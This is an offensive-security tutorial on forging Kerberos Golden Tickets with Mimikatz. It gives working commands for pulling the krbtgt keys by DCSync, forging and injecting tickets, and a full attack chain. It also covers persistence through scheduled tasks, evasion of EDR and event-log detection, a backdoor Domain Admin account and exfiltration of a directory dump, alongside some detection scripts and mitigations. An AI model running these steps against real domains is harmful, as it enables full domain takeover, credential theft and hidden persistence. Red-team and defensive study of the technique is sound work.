
Advanced Guide to Crafting and Leveraging Golden Tickets with Mimikatz

Deep dive into creating, abusing, and persisting Golden Tickets. Learn extraction of the krbtgt hash, ticket forgery, injection, detection evasion, and post-exploitation use cases.

Introduction

Golden Tickets are forged Kerberos Ticket Granting Tickets (TGTs) built with the secret key of the krbtgt account. Holding one, an attacker can impersonate any domain user, including Domain Administrators, without ever authenticating to the domain controller: the KDC decrypts the forged TGT with its own copy of the krbtgt key, trusts its contents, and issues service tickets on request. This guide walks through the full attack chain from key extraction to persistence, detection, and evasion, using the industry-standard tool Mimikatz.

Understanding Golden Tickets is essential for red-teamers aiming to assess AD security and for defenders building robust detection and mitigation controls.

Prerequisites

  • Completed "Mimikatz Installation & Setup - Getting Started" lab.
  • Familiarity with LSASS dumping and plaintext password extraction.
  • Solid grasp of Kerberos ticket structure and basic Active Directory concepts.
  • An account with directory replication rights in the target domain (Domain Admins have them by default), or SYSTEM on a domain controller. The krbtgt keys live only in the directory database, so local admin on a workstation is not enough.

Core Concepts

Kerberos trusts a key known only to the domain controllers: the password-derived keys of the krbtgt account. When a user authenticates, the KDC issues a Ticket Granting Ticket (TGT) encrypted with the krbtgt key; the Privilege Attribute Certificate (PAC) inside it, which carries the user's SID and group RIDs, is signed with that key as well. An attacker who obtains the key can build a TGT with arbitrary contents, a Golden Ticket, and the KDC will decrypt and accept it exactly like one it issued itself.

Key points:

  1. krbtgt account: A built-in domain account whose keys (NT hash for RC4-HMAC, AES128/AES256 keys) encrypt and sign every TGT the KDC issues.
  2. Ticket fields: user name, user RID, domain SID, group RIDs (and optional extra SIDs), start/end/renew times, encryption type.
  3. Lifetime: domain policy gives a legitimate TGT 10 hours by default. Mimikatz gives a forged ticket 10 years, and the KDC accepts it, because it checks the timestamps inside a presented TGT rather than re-applying policy to it.

Visualizing the flow helps: Attacker with replication rights → lsadump::dcsync krbtgt → krbtgt NT hash / AES key → kerberos::golden → kerberos::ptt → service tickets for any AD resource.

Understanding the krbtgt account and its hash

The krbtgt account is created automatically with the domain and is disabled by design. Its password is almost never changed in normal operations (it is set at domain creation and changed again only on some functional-level upgrades or by deliberate rotation), which makes the key a prized target. The keys are stored in the directory database (NTDS.dit) on every domain controller. The account never logs on, so its keys are not present in LSASS memory on any host; they are obtained by replicating the account from a DC with an account that holds the DS-Replication-Get-Changes-All right (DCSync; Domain Admins have it by default), by reading the LSA on a domain controller itself (lsadump::lsa /inject as SYSTEM), or offline from a copy of NTDS.dit plus the SYSTEM registry hive.

Important attributes:

  • RID: 502 (constant across all domains).
  • Domain SID: Placed in the ticket's PAC, together with the user and group RIDs, to assert identity and membership in the domain.
  • Keys: a 16-byte NT hash (MD4 of the UTF-16LE password, used for RC4-HMAC) plus 32-byte AES256 and 16-byte AES128 keys derived from the password and the salt REALMkrbtgt (e.g. CONTOSO.COMkrbtgt).

Because the key is effectively static, resetting the krbtgt password is the only way to invalidate existing Golden Tickets. The KDC keeps the previous password's keys and still accepts tickets encrypted with them, so a single reset is not enough: the password must be reset twice, with enough time between the resets for the first change to replicate to every DC and for legitimately issued TGTs to expire (at least the maximum TGT lifetime, 10 hours by default). Resetting twice in quick succession invalidates every legitimate TGT as well and causes a domain-wide authentication outage.

Extracting the krbtgt key with lsadump::dcsync

Mimikatz's sekurlsa::logonpasswords module enumerates credentials of accounts that have logged on to the local host. krbtgt never logs on, so it will not appear in that output on any machine, including a domain controller. Use the lsadump::dcsync module instead: it asks a domain controller to replicate the account over the directory replication (DRS) protocol, exactly as another DC would. This requires an account with replication rights (Domain Admins, Enterprise Admins and Domain Controllers hold them by default) but no access to the DC's file system or memory.

# Run from any domain-joined host in the context of an account with replication rights
C:\> mimikatz.exe "lsadump::dcsync /domain:contoso.com /user:krbtgt" exit

Typical output (abridged):

[DC] 'contoso.com' will be the domain
[DC] 'DC01.contoso.com' will be the DC server
[DC] 'krbtgt' will be the user account

Object RDN           : krbtgt
SAM Username         : krbtgt
Object Security ID   : S-1-5-21-1122334455-66778899-10111213-502
Object Relative ID   : 502

Credentials:
  Hash NTLM: <krbtgt NT hash>

* Primary:Kerberos-Newer-Keys *
    Default Salt : CONTOSO.COMkrbtgt
    Default Iterations : 4096
    Credentials
      aes256_hmac       (4096) : <krbtgt AES256 key>
      aes128_hmac       (4096) : <krbtgt AES128 key>

Copy the NT hash (the /rc4 argument) and, preferably, the aes256_hmac key (the /aes256 argument) for the forgery step. The domain SID is the Object Security ID with the trailing -502 removed. If you already have SYSTEM on a domain controller, lsadump::lsa /inject /name:krbtgt reads the same keys from the local LSA.

Crafting a Golden Ticket using mimikatz "kerberos::golden"

The kerberos::golden command builds a TGT with arbitrary fields and writes it to a .kirbi file (or injects it directly with /ptt). Below is a template that asserts Domain Admin, Schema Admin and Enterprise Admin membership and sets a 10-year lifetime.

mimikatz "kerberos::golden /user:Administrator /domain:contoso.com /sid:S-1-5-21-1122334455-66778899-10111213 /id:500 /groups:512,518,519 /aes256:<krbtgt AES256 key> /rc4:<krbtgt NT hash> /startoffset:0 /endin:5256000 /renewmax:5256000 /ticket:ticket.kirbi" exit

Explanation of parameters:

  • /user - Name placed in the ticket. Any value was accepted historically; since the November 2021 Kerberos hardening updates (KB5008380) the DC checks that the name and RID belong to an existing account, so use a real one.
  • /id - Relative Identifier of that account; 500 = built-in Administrator.
  • /sid - Domain SID without a trailing RID. Take it from the dcsync output above, from whoami /user on any domain-joined host (drop the last component), or from (Get-ADDomain).DomainSID.
  • /groups - Group RIDs written into the PAC: 512 = Domain Admins, 518 = Schema Admins, 519 = Enterprise Admins (Mimikatz's default set also adds 513 Domain Users and 520 Group Policy Creator Owners). Note that 516 is Domain Controllers, and the local Administrators group (RID 544) is an alias that cannot be asserted here.
  • /aes256 - The krbtgt AES256 key from dcsync. It cannot be random: the KDC decrypts the ticket with its own copy of this key. Prefer it, because modern domains issue AES tickets and an RC4 ticket stands out.
  • /rc4 - The krbtgt NT hash. Needed where the domain still relies on RC4 or where tooling expects it.
  • /startoffset, /endin, /renewmax - Validity in minutes relative to now (0 = now; 5256000 = 10 years). The KDC does not re-apply the 10-hour policy to a presented TGT, so this works, but the overlong lifetime is plainly visible in klist on the host.
  • /ticket - Output file name (default ticket.kirbi); /ptt injects into the current session instead of writing a file.

On success, Mimikatz prints the ticket summary followed by "Final Ticket Saved to file !" (with /ptt, it reports that the golden ticket was successfully submitted for the current session).
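The details above (minutes rather than seconds, a domain SID with no RID, hex keys of the right length) are exactly where forgeries go wrong. The following helper, an added example and not Mimikatz code, assembles the kerberos::golden argument string from typed inputs and rejects malformed ones; the SID and key values in it are constructed placeholders.

```python
"""Assemble and sanity-check a kerberos::golden argument string.

Added example (not part of Mimikatz). Parameter names match Mimikatz;
the SID and keys used at the bottom are constructed placeholders.
"""
import re

# Domain SID: S-1-5-21-<a>-<b>-<c>. A user SID appends one more RID component.
DOMAIN_SID_RE = re.compile(r"^S-1-5-21-\d+-\d+-\d+$")

# Well-known domain group RIDs that can be asserted in the PAC.
# (Administrators, RID 544, is a local alias and cannot be listed here.)
GROUP_RIDS = {
    "Domain Admins": 512,
    "Domain Users": 513,
    "Domain Controllers": 516,
    "Schema Admins": 518,
    "Enterprise Admins": 519,
    "Group Policy Creator Owners": 520,
}

MINUTES_PER_YEAR = 365 * 24 * 60


def domain_sid_from(sid: str) -> str:
    """Return the domain SID, stripping a trailing RID if a user SID was supplied."""
    sid = sid.strip()
    if DOMAIN_SID_RE.match(sid):
        return sid
    head, _, rid = sid.rpartition("-")
    if rid.isdigit() and DOMAIN_SID_RE.match(head):
        return head
    raise ValueError(f"not a domain or user SID: {sid!r}")


def check_key(name: str, value: str, nbytes: int) -> str:
    """Require exactly nbytes of hex: 16 for the NT hash (/rc4), 32 for /aes256."""
    if not re.fullmatch(r"[0-9a-fA-F]{%d}" % (2 * nbytes), value):
        raise ValueError(f"/{name} must be {2 * nbytes} hex chars, got {len(value)}")
    return value.lower()


def golden_ticket_args(user, domain, sid, rid=500,
                       groups=("Domain Admins", "Schema Admins", "Enterprise Admins"),
                       rc4=None, aes256=None, lifetime_years=10,
                       ticket_file="ticket.kirbi") -> str:
    """Build the kerberos::golden command string.

    Lifetimes are minutes (/endin, /renewmax), not seconds: 10 years = 5256000.
    """
    if rc4 is None and aes256 is None:
        raise ValueError("need the krbtgt NT hash (/rc4) and/or AES256 key (/aes256)")
    minutes = lifetime_years * MINUTES_PER_YEAR
    parts = [
        "kerberos::golden",
        f"/user:{user}",
        f"/domain:{domain}",
        f"/sid:{domain_sid_from(sid)}",
        f"/id:{rid}",
        "/groups:" + ",".join(str(GROUP_RIDS[g]) for g in groups),
    ]
    if aes256 is not None:
        parts.append(f"/aes256:{check_key('aes256', aes256, 32)}")
    if rc4 is not None:
        parts.append(f"/rc4:{check_key('rc4', rc4, 16)}")
    parts += ["/startoffset:0", f"/endin:{minutes}", f"/renewmax:{minutes}",
              f"/ticket:{ticket_file}"]
    return " ".join(parts)


def rc4_only(rc4, aes256) -> bool:
    """True when the ticket would be RC4-encrypted (etype 0x17): a downgrade signal in an AES domain."""
    return aes256 is None and rc4 is not None


if __name__ == "__main__":
    # Constructed placeholder values, not real keys or a real domain SID.
    print(golden_ticket_args("Administrator", "contoso.com",
                             "S-1-5-21-1122334455-66778899-10111213-1105",
                             rc4="0" * 32))
```

Passing a user SID (as printed by whoami /user) is deliberately tolerated and reduced to the domain SID, since that is the most common copy-and-paste mistake; a 10-year lifetime is the Mimikatz default and is shown here for parity with the template, not as a recommendation.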

Injecting the forged ticket into the current session (kerberos::ptt)

After creating the ticket, the kerberos::ptt (Pass The Ticket) sub-command loads it into the Kerberos ticket cache of the current logon session via the LSA. Subsequent Kerberos requests from that session use the forged TGT. The Windows access token itself is unchanged, so local tools such as whoami still report the original user and groups.

# Assuming the ticket was saved to ticket.kirbi
mimikatz "kerberos::ptt ticket.kirbi" exit

Verification:

klist
dir \\dc01.contoso.com\C$

klist should list a krbtgt/CONTOSO.COM ticket for the impersonated user, and the directory listing of the DC's admin share succeeds only if the KDC accepted the forged TGT and issued a cifs service ticket. Address targets by host name, not IP address: an IP address has no SPN and makes Windows fall back to NTLM, which the ticket cannot satisfy. whoami /groups is not a valid check, because it reads the local token, which the injected ticket does not touch.

Using the Golden Ticket for domain-wide privileged access

Once the ticket is active, the attacker can access any service that accepts Kerberos: SMB shares, RDP, SQL, Exchange, WinRM, LDAP and so on. Example: mapping a remote admin share.

net use \\dc01.contoso.com\C$

Do not pass /user or a password: that forces a fresh credential-based logon and bypasses the cached ticket. The same applies to a remote PowerShell session over WinRM:

Enter-PSSession -ComputerName server01.contoso.com

Because the logon session already holds a TGT for Administrator, WinRM negotiates Kerberos with it; supplying -Credential would start a new password-based authentication that the forged ticket cannot complete.

Persistence strategies with Golden Tickets

A forged ticket lives in the logon session's memory, so it is lost on logoff or reboot, but the .kirbi file is not. The file remains usable through user password resets and DC reboots until the krbtgt password has been reset twice, so attackers typically embed it in scripts or scheduled tasks that re-inject it automatically.

  • Scheduled Task: Create a task that runs Mimikatz with the kerberos::ptt command at system startup.
  • Startup Script: Place a base64-encoded ticket in C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup and decode/inject via a PowerShell wrapper.
  • Service Account Abuse: Register a Windows service that runs under SYSTEM and calls Mimikatz on demand.

Defensive tip: monitor for atypical scheduled tasks or services that execute mimikatz.exe or reference .kirbi files.

Detection vectors and defensive controls (Event ID 4768/4769/4662, Sysmon, LSA monitoring)

Golden Ticket activity leaves several forensic breadcrumbs:

  1. Event ID 4768 (Kerberos Authentication Ticket Request) and 4769 (Service Ticket Request): a forged TGT is never requested from a DC, so it produces no 4768 at all. The strongest DC-side signal is a 4769 for an account with no 4768 from any DC within the maximum TGT lifetime (10 h by default). Neither event records the ticket's lifetime, so lifetime cannot be alerted on from these logs.
  2. Field anomalies in 4769, 4624 and 4672: the Account Domain is spelled the way it was passed to /domain (often a lowercase FQDN) instead of the NetBIOS name the DC normally writes, or the user name and RID do not match a directory account.
  3. Encryption type: a 4769 with Ticket Encryption Type 0x17 (RC4-HMAC) in a domain whose accounts support AES suggests an RC4-forged ticket or Kerberoasting. Treat it as corroboration only; service accounts that hold only RC4 keys produce the same event legitimately.
  4. Sysmon Event ID 1 / Security 4688 (Process Creation): mimikatz.exe, or any command line containing kerberos::golden, kerberos::ptt or lsadump::dcsync.
  5. Replication from a non-DC: Event ID 4662 on a DC with the DS-Replication-Get-Changes-All GUID (1131f6ad-9c07-11d1-f79f-00c04fc2dcd2) from a host that is not a domain controller is the DCSync that precedes the forgery. Enable "Audit Directory Service Access" (Success) and "Audit Kerberos Authentication Service" plus "Audit Kerberos Service Ticket Operations" via Group Policy.
  6. Security Information and Event Management (SIEM): flag /rc4:, /aes256: and /sid: patterns in command lines, and correlate 4769 against 4768 across all DCs.

Example Splunk search (field names as extracted by the Splunk Add-on for Microsoft Windows; adjust to your sourcetype). It lists users who obtained service tickets without any DC having issued them a TGT in the look-back window:

index=windows sourcetype="WinEventLog:Security" EventCode IN (4768, 4769) earliest=-10h
| eval user=lower(mvindex(split(Account_Name, "@"), 0))
| stats values(EventCode) AS codes, values(Service_Name) AS services, values(Ticket_Encryption_Type) AS etypes BY user, Client_Address
| where isnull(mvfind(codes, "^4768$"))
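The same correlation, run offline over a handful of flattened 4768/4769 records, as an added example (not code from the page or from any vendor). The log lines are constructed: time|EventID|Account|AccountDomain|Service|TicketEncType|ClientIP, the fields a SIEM extracts from the two events.

```python
"""Correlate Kerberos events for Golden Ticket indicators.

Added example, not from the page or any vendor. SAMPLE_LOG is constructed:
time|EventID|Account|AccountDomain|Service|TicketEncType|ClientIP.
"""
from collections import defaultdict
from datetime import datetime, timedelta

SAMPLE_LOG = """\
2024-01-15T09:00:00|4768|alice|CONTOSO.COM|krbtgt|0x12|10.0.0.5
2024-01-15T09:00:05|4769|alice@CONTOSO.COM|CONTOSO.COM|cifs/fs01.contoso.com|0x12|10.0.0.5
2024-01-15T09:30:00|4769|Administrator@contoso.com|contoso.com|cifs/dc01.contoso.com|0x17|10.0.0.77
2024-01-15T09:31:00|4769|Administrator@contoso.com|contoso.com|ldap/dc01.contoso.com|0x17|10.0.0.77
2024-01-15T10:00:00|4768|svc_backup|CONTOSO.COM|krbtgt|0x12|10.0.0.9
2024-01-15T10:00:02|4769|svc_backup@CONTOSO.COM|CONTOSO.COM|MSSQLSvc/legacy01.contoso.com:1433|0x17|10.0.0.9
"""

MAX_TGT_LIFETIME = timedelta(hours=10)   # default domain Kerberos policy
EXPECTED_REALM = "CONTOSO.COM"           # how the DC spells the realm in its own events
RC4 = "0x17"


def parse(log: str):
    """Turn the flattened lines into dicts, sorted by time."""
    events = []
    for line in log.strip().splitlines():
        ts, eid, account, realm, service, etype, ip = line.split("|")
        events.append({
            "time": datetime.fromisoformat(ts),
            "id": int(eid),
            "user": account.split("@", 1)[0].lower(),   # 4769 logs user@REALM, 4768 just user
            "realm": realm,
            "service": service,
            "etype": etype,
            "ip": ip,
        })
    return sorted(events, key=lambda e: e["time"])


def find_golden_ticket_indicators(events):
    """Return {(user, client_ip): set(reasons)} for 4769s that look like forged-TGT use."""
    last_tgt = {}                 # user -> time of the most recent 4768 (TGT issued by a DC)
    findings = defaultdict(set)
    for e in events:
        if e["id"] == 4768:
            last_tgt[e["user"]] = e["time"]
            continue
        if e["id"] != 4769:
            continue
        key = (e["user"], e["ip"])
        # 1. Service ticket with no TGT issued to this user within the TGT lifetime:
        #    a forged TGT never passes through a 4768.
        seen = last_tgt.get(e["user"])
        if seen is None or e["time"] - seen > MAX_TGT_LIFETIME:
            findings[key].add("no_preceding_4768")
        # 2. Realm spelled differently from the DC's own form (Mimikatz writes /domain verbatim).
        if e["realm"] != EXPECTED_REALM:
            findings[key].add("realm_mismatch")
        # 3. RC4 service ticket in an AES domain. Weak on its own: a service whose
        #    account only holds RC4 keys (the legacy SQL host here) produces these too.
        if e["etype"] == RC4:
            findings[key].add("rc4_ticket")
    return dict(findings)


def triage(findings):
    """Rank findings: the missing 4768 is the strong signal; the others only corroborate."""
    ranked = {}
    for key, reasons in findings.items():
        if "no_preceding_4768" in reasons:
            ranked[key] = "high" if len(reasons) > 1 else "medium"
        else:
            ranked[key] = "low"
    return ranked


if __name__ == "__main__":
    found = find_golden_ticket_indicators(parse(SAMPLE_LOG))
    for key, level in triage(found).items():
        print(key, level, sorted(found[key]))
```

In production the 4768 side must be collected from every DC in the domain, since the TGT may have been issued by a different DC than the one that served the 4769; a look-back shorter than the domain's maximum TGT lifetime, or a single-DC view, turns ordinary renewals into false positives.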

Evasion techniques (AES keys, realistic ticket fields, AV/EDR bypass)

Advanced attackers may hide their activity from the detections above by:

  • Forging with the AES256 key (/aes256) rather than the NT hash, so the ticket uses encryption type 18 (AES256-CTS-HMAC-SHA1-96) like every legitimate ticket in an AES domain and never trips RC4 (encryption type 23) rules. The ticket is always encrypted with the krbtgt key; there is no "custom" key to choose.
  • Keeping ticket fields plausible: spell /domain the way the DC does (e.g. CONTOSO.COM), use an existing user with its real RID, take the default group set rather than every admin group, and keep the lifetime near the 10-hour policy, re-forging as needed, so klist and memory forensics show nothing unusual.
  • Living-off-the-Land execution: running Invoke-Mimikatz from PowerShell (optionally with -EncodedCommand) or loading Mimikatz from memory so that mimikatz.exe never appears in process-creation logs and simple process-name allow-lists are bypassed.
  • Process Injection: loading the Mimikatz DLL into a trusted process (e.g. svchost) via reflective DLL injection, evading process-creation alerts.

Defenders should employ behavior-based analytics, monitoring for service tickets without a preceding TGT request, replication from non-DCs, abnormal ticket lifetimes on hosts, and credential-dumping patterns, rather than relying solely on hash or process-name signatures.
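The DC logs never show a ticket's lifetime, but the host's ticket cache does. This added example (not code from the page) parses klist output and flags TGTs with a lifetime beyond the 10-hour policy, a missing "Kdc Called" entry (an injected ticket was never requested from any KDC), or RC4 encryption; KLIST_OUTPUT is a constructed sample in the format of the Windows klist command.

```python
"""Triage a host's Kerberos ticket cache (klist output) for forged-TGT traits.

Added example, not from the page. KLIST_OUTPUT is a constructed sample in the
layout of Windows `klist`; feed real output with: klist | python this_script.py -
"""
import re
import sys
from datetime import datetime, timedelta

MAX_TGT_LIFETIME = timedelta(hours=10)   # domain default; forged tickets often carry years

KLIST_OUTPUT = """\
Current LogonId is 0:0x3e7

Cached Tickets: (2)

#0>     Client: Administrator @ contoso.com
        Server: krbtgt/contoso.com @ contoso.com
        KerbTicket Encryption Type: RSADSI RC4-HMAC(NT)
        Ticket Flags 0x40e00000 -> forwardable renewable initial pre_authent
        Start Time: 1/15/2024 9:00:00 (local)
        End Time:   1/12/2034 9:00:00 (local)
        Renew Time: 1/12/2034 9:00:00 (local)
        Session Key Type: RSADSI RC4-HMAC(NT)
        Cache Flags: 0x1 -> PRIMARY
        Kdc Called:

#1>     Client: alice @ CONTOSO.COM
        Server: krbtgt/CONTOSO.COM @ CONTOSO.COM
        KerbTicket Encryption Type: AES-256-CTS-HMAC-SHA1-96
        Ticket Flags 0x40e10000 -> forwardable renewable initial pre_authent name_canonicalize
        Start Time: 1/15/2024 8:55:12 (local)
        End Time:   1/15/2024 18:55:12 (local)
        Renew Time: 1/22/2024 8:55:12 (local)
        Session Key Type: AES-256-CTS-HMAC-SHA1-96
        Cache Flags: 0x1 -> PRIMARY
        Kdc Called: DC01.contoso.com
"""

FIELD = re.compile(r"^\s*(Client|Server|KerbTicket Encryption Type|Start Time|End Time|"
                   r"Renew Time|Kdc Called):\s*(.*?)\s*$")
TIME_FMT = "%m/%d/%Y %H:%M:%S"


def parse_klist(text: str):
    """Split klist output into one dict per '#n>' ticket block."""
    tickets, current = [], None
    for line in text.splitlines():
        m = re.match(r"^#(\d+)>\s*(.*)", line)
        if m:
            current = {"index": int(m.group(1))}
            tickets.append(current)
            line = m.group(2)          # the first field shares the '#n>' line
        if current is None:
            continue
        f = FIELD.match(line)
        if f:
            current[f.group(1)] = f.group(2)
    return tickets


def _when(value: str) -> datetime:
    return datetime.strptime(value.replace(" (local)", ""), TIME_FMT)


def suspicious_tgts(tickets):
    """Return {index: [reasons]} for TGTs (Server: krbtgt/...) that look forged."""
    out = {}
    for t in tickets:
        if not t.get("Server", "").startswith("krbtgt/"):
            continue
        reasons = []
        lifetime = _when(t["End Time"]) - _when(t["Start Time"])
        if lifetime > MAX_TGT_LIFETIME:
            reasons.append(f"lifetime {lifetime.days} days exceeds policy")
        if not t.get("Kdc Called"):
            reasons.append("no KDC contacted for this TGT (injected, not requested)")
        if "RC4" in t.get("KerbTicket Encryption Type", ""):
            reasons.append("RC4 TGT (AES expected)")
        if reasons:
            out[t["index"]] = reasons
    return out


if __name__ == "__main__":
    text = sys.stdin.read() if sys.argv[1:] == ["-"] else KLIST_OUTPUT
    for idx, why in suspicious_tgts(parse_klist(text)).items():
        print(f"ticket #{idx}: " + "; ".join(why))
```

The 3650-day lifetime in the sample is not arbitrary: Mimikatz's ten-year default is 5256000 minutes, which is exactly 3650 days and so lands a few days short of the calendar decade, a value that never occurs in a legitimate cache. Run this across a fleet with the same per-session klist collection your EDR already performs, rather than as an interactive check.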

Post-exploitation use cases (lateral movement, credential dumping, privilege escalation)

Golden Tickets unlock a suite of follow-on actions:

  1. Lateral Movement: Use psexec, SMB, or WinRM to hop to other hosts, leveraging the forged TGT for authentication.
  2. Credential Dumping: With Domain Admin rights, DCSync any account's keys (service accounts included) or dump LSASS on member servers to harvest the credentials of logged-on users.
  3. Privilege Escalation: Add an attacker-controlled user to the Domain Admins group via ADUC or PowerShell, then stop using the Golden Ticket to hide the original vector.
  4. Domain Trust Exploitation: Within a forest, a Golden Ticket forged in a child domain can carry the forest root's Enterprise Admins SID in its SID history (/sids:<root-domain-SID>-519) and gain forest-wide access, because SID filtering is not applied between domains of the same forest. Across a forest trust, SID filtering strips such SIDs by default, so the technique does not cross it without further work.

Sample PowerShell to add a new user to Domain Admins:

Import-Module ActiveDirectory
New-ADUser -Name "RedTeam" -SamAccountName redteam -AccountPassword (ConvertTo-SecureString "P@ssw0rd!" -AsPlainText -Force) -Enabled $true
Add-ADGroupMember -Identity "Domain Admins" -Members redteam

After the user is created, the attacker can retire the Golden Ticket, making the compromise harder to attribute.

Practical Examples

Scenario: An internal penetration test on a midsize enterprise. The tester has compromised a workstation and escalated to a Domain Admin account (any account with directory replication rights would do).

  1. DCSync the krbtgt account to obtain its keys and the domain SID.
  2. Forge a Golden Ticket for Administrator with a 5-year lifetime.
  3. Inject the ticket and verify with klist and a listing of a DC's admin share.
  4. Create a scheduled task that runs the injection script at boot.
  5. Use the ticket to replicate the whole directory (lsadump::dcsync /domain:contoso.local /all /csv) and exfiltrate the result.

Full command chain (concise, run from PowerShell):

# 1. Pull the krbtgt keys and the domain SID
.\mimikatz.exe "lsadump::dcsync /domain:contoso.local /user:krbtgt" exit | Select-String "Hash NTLM|aes256_hmac|Object Security ID"
# 2. Create the ticket (5 years = 2628000 minutes)
.\mimikatz.exe "kerberos::golden /user:Administrator /domain:contoso.local /sid:S-1-5-21-1122334455-66778899-10111213 /id:500 /groups:512,518,519 /aes256:<krbtgt AES256 key> /startoffset:0 /endin:2628000 /renewmax:2628000 /ticket:ticket.kirbi" exit
# 3. Inject
.\mimikatz.exe "kerberos::ptt ticket.kirbi" exit
# 4. Verify
klist
dir \\dc01.contoso.local\C$

Tools & Commands

  • Mimikatz: lsadump::dcsync, lsadump::lsa /inject, kerberos::golden, kerberos::ptt, kerberos::list, sekurlsa::logonpasswords
  • PsExec: Run Mimikatz as SYSTEM on a domain controller for lsadump::lsa /inject; not needed for DCSync.
  • PowerShell: New-ADUser, Add-ADGroupMember, Invoke-Command, Get-ADDomain
  • klist: Inspect and purge the current session's ticket cache.
  • Sysinternals ProcDump: Dump LSASS on member hosts to harvest logged-on credentials (the krbtgt keys are never in LSASS).
  • BloodHound: Map which principals hold replication rights and the paths that lead to them.

Defense & Mitigation

Defending against Golden Tickets requires a layered approach:

  1. Regular krbtgt password rotation: Reset at least twice a year and immediately after any suspected domain compromise. Every rotation is two resets separated by at least the maximum TGT lifetime (10 h by default) plus replication time; Microsoft's New-KrbtgtKeys.ps1 script automates the sequence and the replication checks.
  2. Tiered admin model and replication rights: Separate privileged accounts, limit who can log on to DCs, and audit the DS-Replication-Get-Changes-All right so that only domain controllers (and any deliberately approved sync accounts) hold it.
  3. Credential Guard & Remote Credential Guard: Protect cached credentials on member hosts, which raises the bar for reaching a replication-capable account. They do not protect the krbtgt keys, which live on the DCs.
  4. Enhanced Auditing: Enable Kerberos authentication and service-ticket events, directory service access (4662) on DCs, and alert on service tickets without a preceding TGT request and on anomalous group memberships.
  5. EDR/UEBA: Deploy detection rules for Mimikatz command lines, suspicious scheduled tasks, and replication requests from non-DC hosts.
  6. Restrict Delegation: Use constrained delegation and disable unconstrained delegation where possible, so that legitimate TGTs are not left lying on member servers.

Sample Group Policy settings:

Computer Configuration → Policies → Windows Settings → Security Settings → Advanced Audit Policy Configuration → Audit Policies → Account Logon → Audit Kerberos Authentication Service and Audit Kerberos Service Ticket Operations → Success, Failure
Computer Configuration → Policies → Windows Settings → Security Settings → Advanced Audit Policy Configuration → Audit Policies → DS Access → Audit Directory Service Access → Success (domain controllers)
Computer Configuration → Policies → Administrative Templates → System → Device Guard → Turn On Virtualization Based Security → Credential Guard Configuration: Enabled with UEFI lock

Common Mistakes

  • Forgetting to include the correct domain SID (or pasting a user SID with its RID still attached); tickets will be rejected.
  • Looking for the krbtgt hash in an LSASS dump; it is never there, on workstations or on DCs. Replicate it (DCSync) or read it from the DC's LSA or NTDS.dit.
  • Assuming the KDC rejects a lifetime longer than the 10 h policy. It does not, but a ten-year TGT is an obvious anomaly in klist and memory forensics; keep lifetimes plausible where stealth matters.
  • Forging with the NT hash (/rc4) in a domain that issues AES tickets, which makes the ticket's encryption type stand out.
  • Neglecting to persist the ticket file and re-inject it, causing loss of access after reboot or logoff.
  • Relying solely on process-name detection; attackers can rename or inject Mimikatz DLLs.

Real-World Impact

Forged authentication tokens have featured in high-profile intrusions: the 2020 SolarWinds supply-chain campaign, for instance, used forged SAML tokens ("Golden SAML", the federation analogue of the Golden Ticket) together with compromised AD credentials to move laterally and exfiltrate data.

In my consulting work, I have seen organizations where a single stolen krbtgt hash gave attackers unrestricted access for months before detection-often because ticket-lifetime anomalies were not logged.

Trends indicate increased use of “ticket-granting-ticket abuse” in ransomware campaigns, as it provides a fast, low-noise foothold for encrypting file shares.

Practice Exercises

  1. Set up a lab with a Windows Server 2019 DC and a Windows 10 client. Use Mimikatz to extract the krbtgt hash and forge a Golden Ticket for a new user you create.
  2. Configure Windows Event Forwarding to a SIEM. Write a detection rule that triggers on a 4769 for which no DC has logged a 4768 for the same user in the preceding 10 h.
  3. Implement a scheduled task that runs a PowerShell wrapper to inject a stored ticket at startup. Verify persistence across reboots.
  4. Rotate the krbtgt password and observe how existing tickets become invalid. Document the timeline.


Summary

Golden Tickets represent the pinnacle of Kerberos abuse: a single krbtgt hash unlocks domain-wide privileges. This guide covered extraction, ticket forging, injection, persistence, detection, evasion, and post-exploitation strategies. By mastering these techniques, defenders can better anticipate attacker behavior, implement robust detection, and enforce mitigations such as regular krbtgt rotation and Credential Guard.

Keep the following checklist handy:

  • Secure LSASS - use Credential Guard.
  • Rotate krbtgt at least twice a year (two resets, spaced by the TGT lifetime) and after any suspected compromise.
  • Monitor Kerberos events for abnormal lifetimes.
  • Audit scheduled tasks and services for Mimikatz usage.
  • Adopt a tiered admin model to limit exposure.